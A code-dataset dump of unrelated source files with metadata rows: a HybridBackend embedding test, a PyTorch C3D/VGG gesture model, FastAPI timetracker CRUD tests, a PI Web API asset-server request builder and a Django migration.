return final_loss
@unittest.skipUnless(
os.getenv('HYBRIDBACKEND_WITH_CUDA') == 'ON', 'GPU required')
class DenseFeaturesTest(unittest.TestCase):
'''Tests for embedding columns.
'''
def setUp(self): # pylint: disable=invalid-name
os.environ['CUDA_VISIBLE_DEVICES'] = '0,1'
def test_get_dense_tensor(self):
results = hbtest.Spawn()(_test_get_dense_tensor)
np.testing.assert_allclose(
results[0],
[[7., 11.],
[2., 3.5],
[0., 0.],
[3., 5.]],
rtol=1e-6)
def test_get_dense_tensor_sharded(self):
results = hbtest.Spawn(2)(_test_get_dense_tensor_sharded)
np.testing.assert_allclose(
results[0],
[[7., 11.],
[2., 3.5],
[0., 0.],
[3., 5.]],
rtol=1e-6)
np.testing.assert_allclose(
results[1],
[[7., 11.],
[2., 3.5],
[0., 0.],
[3., 5.]],
rtol=1e-6)
def test_get_dense_tensor_with_varscope(self):
results = hbtest.Spawn(2)(_test_get_dense_tensor_with_varscope)
np.testing.assert_allclose(
results[0],
[[7., 11.],
[2., 3.5],
[0., 0.],
[3., 5.]],
rtol=1e-6)
np.testing.assert_allclose(
results[1],
[[7., 11.],
[2., 3.5],
[0., 0.],
[3., 5.]],
rtol=1e-6)
def test_embedding_column_with_optimizer(self):
results = hbtest.Spawn(2)(
lambda rank: _test_embedding_column_with_optimizer(rank, 0.0001))
np.testing.assert_allclose(results[0], 0.490101, rtol=1e-6)
np.testing.assert_allclose(results[1], 0.490101, rtol=1e-6)
def test_get_dense_tensor_disable_concat(self):
results = hbtest.Spawn()(_test_get_dense_tensor_disable_concat)
np.testing.assert_equal(len(results[0]), 2)
def test_embedding_column_with_coalescing(self):
results = hbtest.Spawn(2)(
lambda rank: _test_embedding_column_with_coalescing(rank, 0.0001))
np.testing.assert_allclose(results[0], 0.490101, rtol=1e-6)
np.testing.assert_allclose(results[1], 0.490101, rtol=1e-6)
def test_embedding_column_function(self):
results = hbtest.Spawn(2)(
lambda rank: _test_embedding_column_with_function(rank, 0.0001))
np.testing.assert_allclose(results[0], 0.490101, rtol=1e-6)
np.testing.assert_allclose(results[1], 0.490101, rtol=1e-6)
def test_embedding_column_function_unique(self):
results = hbtest.Spawn(2)(
lambda rank: _test_embedding_column_with_function_unique(rank, 0.0001))
np.testing.assert_allclose(results[0], 0.490101, rtol=1e-6)
np.testing.assert_allclose(results[1], 0.490101, rtol=1e-6)
def test_get_dense_tensor_with_segment_rank(self):
results = hbtest.Spawn(2)(_test_get_dense_tensor_with_segment_rank)
np.testing.assert_allclose(
results[0],
[[0., 0.],
[4., 6.5],
[0., 0.],
[3., 5.],
[0., 0.],
[0., 0.],
[0., 0.],
[0., 0.]],
rtol=1e-6)
np.testing.assert_allclose(
results[1],
[[0., 0.],
[4., 6.5],
[0., 0.],
[3., 5.],
[0., 0.],
[0., 0.],
[0., 0.],
[0., 0.]],
rtol=1e-6)
def test_shared_embedding_column(self):
results = hbtest.Spawn(2)(
lambda rank: _test_shared_embedding_column(rank, 0.0001))
np.testing.assert_allclose(results[0], 0.490101, rtol=1e-6)
np.testing.assert_allclose(results[1], 0.490101, rtol=1e-6)
# pylint: enable=missing-docstring
if __name__ == '__main__':
hbtest.main(f'{__file__}.xml')
| 33.72
| 80
| 0.649786
| 2,867
| 21,918
| 4.71887
| 0.08685
| 0.033927
| 0.056545
| 0.049967
| 0.896593
| 0.885283
| 0.870944
| 0.861926
| 0.841452
| 0.83783
| 0
| 0.043458
| 0.222055
| 21,918
| 649
| 81
| 33.771957
| 0.749985
| 0.053837
| 0
| 0.821691
| 0
| 0
| 0.019821
| 0.004883
| 0
| 0
| 0
| 0
| 0.068015
| 1
| 0.056985
| false
| 0
| 0.049632
| 0
| 0.145221
| 0.001838
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
49769e87e9073c01a246a5ab14f42dcea1f551d1
| 7,534
|
py
|
Python
|
model/model.py
|
Seraphir/gesture_recognition
|
06ab1a8e7601d52efed02303630abec2e15bad50
|
[
"MIT"
] | null | null | null |
model/model.py
|
Seraphir/gesture_recognition
|
06ab1a8e7601d52efed02303630abec2e15bad50
|
[
"MIT"
] | null | null | null |
model/model.py
|
Seraphir/gesture_recognition
|
06ab1a8e7601d52efed02303630abec2e15bad50
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
from base import BaseModel
from torchvision.models import resnet50
cfgs = {
'A': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'B': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],
'E': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],
}
class C3DVGG(nn.Module):
def __init__(self, num_classes=10, batch_norm=True, finetune=None):
super().__init__()
self.net2d = make_layers(cfgs['D'], batch_norm=batch_norm)
self.avgpool = nn.AdaptiveAvgPool2d((7, 7))
self.lc2d = nn.Sequential(
nn.Linear(512 * 7 * 7, 2048),
nn.ReLU(True)
)
self.net3d = nn.Sequential(
nn.Conv3d(3, 64, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)),
nn.Conv3d(64, 128, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)),
nn.Conv3d(128, 256, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
nn.ReLU(),
nn.Conv3d(256, 256, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)),
nn.Conv3d(256, 512, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
nn.ReLU(),
nn.Conv3d(512, 512, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)),
nn.Conv3d(512, 512, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
nn.ReLU(),
nn.Conv3d(512, 512, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2), padding=(0, 1, 1)),
)
self.lc3d = nn.Sequential(
nn.Linear(8192, 2048),
nn.ReLU(True)
)
self.classifier = nn.Sequential(
nn.Linear(4096, 4096),
nn.ReLU(True),
nn.Dropout(),
nn.Linear(4096, 4096),
nn.ReLU(True),
nn.Dropout(),
nn.Linear(4096, num_classes),
)
self._initialize_weights()
if finetune is not None:
checkpoint = torch.load(finetune)
self.load_state_dict(checkpoint['state_dict'])
print("loaded {}".format(finetune))
def forward(self, x1, x2):
x1 = self.net2d(x1)
x1 = self.avgpool(x1)
x1 = torch.flatten(x1, 1)
x1 = self.lc2d(x1)
x2 = self.net3d(x2)
x2 = x2.view(-1, 8192)
x2 = self.lc3d(x2)
x = torch.cat((x1, x2), dim=1)
x = self.classifier(x)
# F.log_softmax(x, dim=1)
return x
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Conv3d):
torch.nn.init.kaiming_normal_(m.weight)
elif isinstance(m, nn.BatchNorm3d):
m.weight.data.fill_(1)
m.bias.data.zero_()
class SimpleC3DVGG(nn.Module):
def __init__(self, num_classes=10, batch_norm=True, finetune=None):
super().__init__()
self.net2d = make_layers(cfgs['D'], batch_norm=batch_norm)
self.avgpool = nn.AdaptiveAvgPool2d((7, 7))
self.net3d = nn.Sequential(
nn.Conv3d(3, 64, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)),
nn.Conv3d(64, 128, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)),
nn.Conv3d(128, 256, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
nn.ReLU(),
nn.Conv3d(256, 256, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)),
nn.Conv3d(256, 512, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
nn.ReLU(),
nn.Conv3d(512, 512, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)),
nn.Conv3d(512, 512, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
nn.ReLU(),
nn.Conv3d(512, 512, kernel_size=(3, 3, 3), padding=(1, 1, 1)),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2), padding=(0, 1, 1)),
)
self.classifier = nn.Sequential(
nn.Linear(33280, 2048),
nn.ReLU(True),
nn.Dropout(0.85),
nn.Linear(2048, num_classes),
)
self._initialize_weights()
if finetune is not None:
checkpoint = torch.load(finetune)
self.load_state_dict(checkpoint['state_dict'])
print("loaded {}".format(finetune))
def forward(self, x1, x2):
x1 = self.net2d(x1)
x1 = self.avgpool(x1)
x1 = x1.view(-1, 25088)
x2 = self.net3d(x2)
x2 = x2.view(-1, 8192)
x = torch.cat((x1, x2), dim=1)
x = self.classifier(x)
return x
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Conv3d):
torch.nn.init.kaiming_normal_(m.weight)
elif isinstance(m, nn.BatchNorm3d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def make_layers(cfg, batch_norm=False):
layers = []
in_channels = 3
for v in cfg:
if v == 'M':
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
else:
conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
if batch_norm:
layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
else:
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = v
return nn.Sequential(*layers)
# if __name__ == "__main__":
# from torchviz import make_dot
#
# x1 = torch.rand(1, 3, 224, 224)
# x2 = torch.rand(1, 3, 32, 112, 112)
# net = MergeNet(num_classes=3)
# print(net)
# outputs = net.forward(x1, x2)
# g = make_dot(outputs)
# g.render('espnet_model', view=False)
# print(outputs.size())
| 38.635897
| 113
| 0.511946
| 1,047
| 7,534
| 3.575931
| 0.127985
| 0.021368
| 0.016026
| 0.051282
| 0.800214
| 0.787393
| 0.771368
| 0.759081
| 0.756944
| 0.731838
| 0
| 0.117498
| 0.321078
| 7,534
| 194
| 114
| 38.835052
| 0.614467
| 0.044598
| 0
| 0.744048
| 0
| 0
| 0.012109
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0.029762
| 0
| 0.10119
| 0.011905
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
498a8a99f576918ef7440ecf85e9de8ffa0b9137
| 6,786
|
py
|
Python
|
tests/test_main.py
|
VictorDavis/timetracker
|
4bbdcaa0c8e42457b4b8e96805f98f2d7a4edf07
|
[
"MIT"
] | null | null | null |
tests/test_main.py
|
VictorDavis/timetracker
|
4bbdcaa0c8e42457b4b8e96805f98f2d7a4edf07
|
[
"MIT"
] | null | null | null |
tests/test_main.py
|
VictorDavis/timetracker
|
4bbdcaa0c8e42457b4b8e96805f98f2d7a4edf07
|
[
"MIT"
] | null | null | null |
from . import client
def test_hello_world():
response = client.get("/")
assert response.status_code == 200
record = response.json()
assert record["message"] == "Hello, world!"
def test_payer_crud():
# params
payer_name = "Darwin"
# payload
payload = {
"name": payer_name,
}
# create object
response = client.post("/payers", json=payload)
assert response.status_code == 200
record = response.json()
payer_id = record["id"]
assert record["name"] == payer_name
# create twice (not ok)
response = client.post("/payers", json=payload)
assert response.status_code == 409
error = response.json()
assert "Duplicate entry" in error["detail"]
# get object
response = client.get(f"/payers/{payer_id}", json=payload)
assert response.status_code == 200
record = response.json()
assert record["id"] == payer_id
assert record["name"] == payer_name
# delete object
response = client.delete(f"/payers/{payer_id}", json=payload)
assert response.status_code == 200
record = response.json()
assert record["id"] == payer_id
assert record["name"] == payer_name
# delete twice (not ok)
response = client.delete(f"/payers/{payer_id}", json=payload)
assert response.status_code == 404
error = response.json()
assert "Payer not found" in error["detail"]
# get after delete (not ok)
response = client.get(f"/payers/{payer_id}", json=payload)
assert response.status_code == 404
error = response.json()
assert "Payer not found" in error["detail"]
def test_client_crud():
# params
payer_name = "Payer1"
client_name = "Wallace"
# payload
payload = {
"payer": {"name": payer_name},
"name": client_name,
}
# create object
response = client.post("/clients", json=payload)
assert response.status_code == 200
record = response.json()
client_id = record["id"]
assert record["name"] == client_name
# create twice (not ok)
response = client.post("/clients", json=payload)
assert response.status_code == 409
error = response.json()
assert "Duplicate entry" in error["detail"]
# get object
response = client.get(f"/clients/{client_id}", json=payload)
assert response.status_code == 200
record = response.json()
assert record["id"] == client_id
assert record["name"] == client_name
# delete object
response = client.delete(f"/clients/{client_id}", json=payload)
assert response.status_code == 200
record = response.json()
assert record["id"] == client_id
assert record["name"] == client_name
# delete twice (not ok)
response = client.delete(f"/clients/{client_id}", json=payload)
assert response.status_code == 404
error = response.json()
assert "Client not found" in error["detail"]
# get after delete (not ok)
response = client.get(f"/clients/{client_id}", json=payload)
assert response.status_code == 404
error = response.json()
assert "Client not found" in error["detail"]
def test_task_crud():
# params
payer_name = "Payer1"
client_name = "Client1"
task_date = "2021-06-01"
task_description = "I did a thing."
task_hours = 2.5
# payload
payload = {
"client": {"payer": {"name": payer_name}, "name": client_name,},
"date": task_date,
"description": task_description,
"hours": task_hours,
}
# create object
response = client.post("/tasks", json=payload)
assert response.status_code == 200
record = response.json()
task_id = record["id"]
assert record["date"] == task_date
assert record["description"] == task_description
assert record["hours"] == task_hours
# create twice (not ok)
response = client.post("/tasks", json=payload)
assert response.status_code == 409
error = response.json()
assert "Duplicate entry" in error["detail"]
# get object
response = client.get(f"/tasks/{task_id}", json=payload)
assert response.status_code == 200
record = response.json()
assert record["id"] == task_id
assert record["date"] == task_date
assert record["description"] == task_description
assert record["hours"] == task_hours
# delete object
response = client.delete(f"/tasks/{task_id}", json=payload)
assert response.status_code == 200
record = response.json()
assert record["id"] == task_id
assert record["date"] == task_date
assert record["description"] == task_description
assert record["hours"] == task_hours
# delete twice (not ok)
response = client.delete(f"/tasks/{task_id}", json=payload)
assert response.status_code == 404
error = response.json()
assert "Task not found" in error["detail"]
# get after delete (not ok)
response = client.get(f"/tasks/{task_id}", json=payload)
assert response.status_code == 404
error = response.json()
assert "Task not found" in error["detail"]
def test_paycheck_crud():
# params
payer_name = "Payer1"
paycheck_date = "2021-06-01"
paycheck_amount = 2.5
# payload
payload = {
"payer": {"name": payer_name},
"date": paycheck_date,
"amount": paycheck_amount,
}
# create object
response = client.post("/paychecks", json=payload)
assert response.status_code == 200
record = response.json()
paycheck_id = record["id"]
assert record["date"] == paycheck_date
assert record["amount"] == paycheck_amount
# create twice (not ok)
response = client.post("/paychecks", json=payload)
assert response.status_code == 409
error = response.json()
assert "Duplicate entry" in error["detail"]
# get object
response = client.get(f"/paychecks/{paycheck_id}", json=payload)
assert response.status_code == 200
record = response.json()
assert record["id"] == paycheck_id
assert record["date"] == paycheck_date
assert record["amount"] == paycheck_amount
# delete object
response = client.delete(f"/paychecks/{paycheck_id}", json=payload)
assert response.status_code == 200
record = response.json()
assert record["id"] == paycheck_id
assert record["date"] == paycheck_date
assert record["amount"] == paycheck_amount
# delete twice (not ok)
response = client.delete(f"/paychecks/{paycheck_id}", json=payload)
assert response.status_code == 404
error = response.json()
assert "Paycheck not found" in error["detail"]
# get after delete (not ok)
response = client.get(f"/paychecks/{paycheck_id}", json=payload)
assert response.status_code == 404
error = response.json()
assert "Paycheck not found" in error["detail"]
| 29.376623
| 72
| 0.646331
| 831
| 6,786
| 5.150421
| 0.074609
| 0.084112
| 0.116822
| 0.140187
| 0.911682
| 0.900234
| 0.861682
| 0.815187
| 0.801168
| 0.796495
| 0
| 0.018704
| 0.220012
| 6,786
| 230
| 73
| 29.504348
| 0.789911
| 0.072944
| 0
| 0.794872
| 0
| 0
| 0.149888
| 0.01534
| 0
| 0
| 0
| 0
| 0.429487
| 1
| 0.032051
| false
| 0
| 0.00641
| 0
| 0.038462
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4999deba01f1ab799fc42cae9d5a2d565d92fcd1
| 12,086
|
py
|
Python
|
piwebasync/api/controllers/assetservers.py
|
newvicx/piwebasync
|
fc0d159aa4b99667777f428a090fe7a102481fea
|
[
"MIT"
] | null | null | null |
piwebasync/api/controllers/assetservers.py
|
newvicx/piwebasync
|
fc0d159aa4b99667777f428a090fe7a102481fea
|
[
"MIT"
] | 2
|
2022-03-02T17:42:21.000Z
|
2022-03-29T19:24:01.000Z
|
piwebasync/api/controllers/assetservers.py
|
newvicx/piwebasync
|
fc0d159aa4b99667777f428a090fe7a102481fea
|
[
"MIT"
] | null | null | null |
from typing import List, Tuple, Union
from ...types import APIRequestType, ControllerType, QueryStrType
class AssetServers:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver.html
"""
CONTROLLER = "assetservers"
def __init__(self, constructor: ControllerType) -> None:
self._constructor = constructor
def list(
self,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/list.html
"""
action = None
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
selected_fields=selected_fields,
web_id_type=web_id_type
)
def get(
self,
webid: str,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/get.html
"""
action = None
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
selected_fields=selected_fields,
web_id_type=web_id_type
)
def get_by_path(
self,
path: str,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getbypath.html
"""
action = None
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
path=path,
selected_fields=selected_fields,
web_id_type=web_id_type
)
def get_analysis_rule_plugins(
self,
webid: str,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getanalysisruleplugins.html
"""
action = "analysisruleplugins"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
selected_fields=selected_fields,
web_id_type=web_id_type
)
def get_by_name(
self,
name: str,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getbyname.html
"""
action = None
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
name=name,
selected_fields=selected_fields,
web_id_type=web_id_type
)
def get_databases(
self,
webid: str,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getdatabases.html
"""
action = "assetdatabases"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
selected_fields=selected_fields,
web_id_type=web_id_type
)
def get_notification_contact_templates(
self,
webid: str,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getnotificationcontacttemplates.html
"""
action = "notificationcontacttemplates"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
selected_fields=selected_fields,
web_id_type=web_id_type
)
def get_notification_plugins(
self,
webid: str,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getnotificationplugins.html
"""
action = "notificationplugins"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
selected_fields=selected_fields,
web_id_type=web_id_type
)
def get_security(
self,
webid: str,
security_item: Union[List[str], Tuple[str]] = None,
user_identity: Union[List[str], Tuple[str]] = None,
force_refresh: bool = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getsecurity.html
"""
action = "security"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
security_item_many=security_item,
user_identity_many=user_identity,
force_refresh=force_refresh,
selected_fields=selected_fields,
web_id_type=web_id_type
)
def get_security_entries(
self,
webid: str,
security_item: str = None,
name_filter: QueryStrType = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getsecurityentries.html
"""
action = "securityentries"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
security_item=security_item,
name_filter=name_filter,
selected_fields=selected_fields,
web_id_type=web_id_type,
)
def get_security_entry_by_name(
self,
webid: str,
name: str,
security_item: str = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getsecurityentrybyname.html
"""
action = "securityentries"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
security_item=security_item,
selected_fields=selected_fields,
web_id_type=web_id_type,
add_path = [name]
)
def get_security_identities(
self,
webid: str,
query: QueryStrType = None,
field: str = None,
sort_field: str = None,
sort_order: str = None,
max_count: int = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getsecurityidentities.html
"""
action = "securityidentities"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
query=query,
field=field,
sort_field=sort_field,
sort_order=sort_order,
max_count=max_count,
selected_fields=selected_fields,
web_id_type=web_id_type,
)
def get_security_identities_for_user(
self,
webid: str,
user_identity: str = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getsecurityidentitiesforuser.html
"""
action = "securityidentities"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
user_identity=user_identity,
selected_fields=selected_fields,
web_id_type=web_id_type,
)
def get_security_mappings(
self,
webid: str,
query: QueryStrType = None,
field: str = None,
sort_field: str = None,
sort_order: str = None,
max_count: int = None,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getsecuritymappings.html
"""
action = "securitymappings"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
query=query,
field=field,
sort_field=sort_field,
sort_order=sort_order,
max_count=max_count,
selected_fields=selected_fields,
web_id_type=web_id_type,
)
def get_time_rule_plugins(
self,
webid: str,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/gettimeruleplugins.html
"""
action = "timeruleplugins"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
selected_fields=selected_fields,
web_id_type=web_id_type
)
def get_unit_classes(
self,
webid: str,
selected_fields: Union[List[str], Tuple[str]] = None,
web_id_type: str = None,
) -> APIRequestType:
"""
https://docs.osisoft.com/bundle/pi-web-api-reference/page/help/controllers/assetserver/actions/getunitclasses.html
"""
action = "unitclasses"
return self._constructor._build_request(
method="GET",
protocol="HTTP",
controller=self.CONTROLLER,
action=action,
webid=webid,
selected_fields=selected_fields,
web_id_type=web_id_type
)
| 29.841975
| 139
| 0.579927
| 1,215
| 12,086
| 5.544856
| 0.08642
| 0.099748
| 0.064124
| 0.045421
| 0.844738
| 0.834348
| 0.827223
| 0.827223
| 0.827223
| 0.827223
| 0
| 0
| 0.317309
| 12,086
| 404
| 140
| 29.915842
| 0.816507
| 0.162999
| 0
| 0.797297
| 0
| 0
| 0.032881
| 0.002877
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057432
| false
| 0
| 0.006757
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
49a2381a0358b7846a4f2f91b517df7aab7202f0
| 1,948
|
py
|
Python
|
system/migrations/0003_auto_20180608_0923.py
|
17621368758/tranpathPY
|
01cf371c260275811e3750de116fa5b95718bafe
|
[
"MIT"
] | 1
|
2020-06-05T16:01:21.000Z
|
2020-06-05T16:01:21.000Z
|
system/migrations/0003_auto_20180608_0923.py
|
17621368758/tranpathPY
|
01cf371c260275811e3750de116fa5b95718bafe
|
[
"MIT"
] | 4
|
2020-02-11T23:27:37.000Z
|
2021-12-13T19:52:11.000Z
|
system/migrations/0003_auto_20180608_0923.py
|
17621368758/tranpathPY
|
01cf371c260275811e3750de116fa5b95718bafe
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0.5 on 2018-06-08 09:23
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('system', '0002_auto_20180601_2250'),
]
operations = [
migrations.AlterField(
model_name='excel_import_file_fields_name',
name='adder',
field=models.ForeignKey(help_text='{"form":"F"}', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='excel_import_file_fields_name_adder', to='system.User', verbose_name='添加人(User.id)'),
),
migrations.AlterField(
model_name='excel_import_file_fields_name',
name='excelImportFileMainId',
field=models.ForeignKey(help_text='{"form":"F"}', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='excel_import_file_main_id', to='system.Excel_import_file_main', verbose_name='导入文件主表ID'),
),
migrations.AlterField(
model_name='excel_import_file_main',
name='adder',
field=models.ForeignKey(help_text='{"form":"F"}', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='excel_import_file_main_adder', to='system.User', verbose_name='添加人(User.id)'),
),
migrations.AlterField(
model_name='excel_import_file_main',
name='importer',
field=models.ForeignKey(help_text='{"form":"F"}', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='importer', to='system.User', verbose_name='设置字段名时间操作人(User.id)'),
),
migrations.AlterField(
model_name='excel_import_file_main',
name='setFieldNamer',
field=models.ForeignKey(help_text='{"form":"F"}', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='setFieldNamer', to='system.User', verbose_name='设置字段名时间操作人(User.id)'),
),
]
| 48.7
| 222
| 0.667864
| 240
| 1,948
| 5.145833
| 0.233333
| 0.080162
| 0.109312
| 0.123077
| 0.766802
| 0.766802
| 0.758704
| 0.758704
| 0.700405
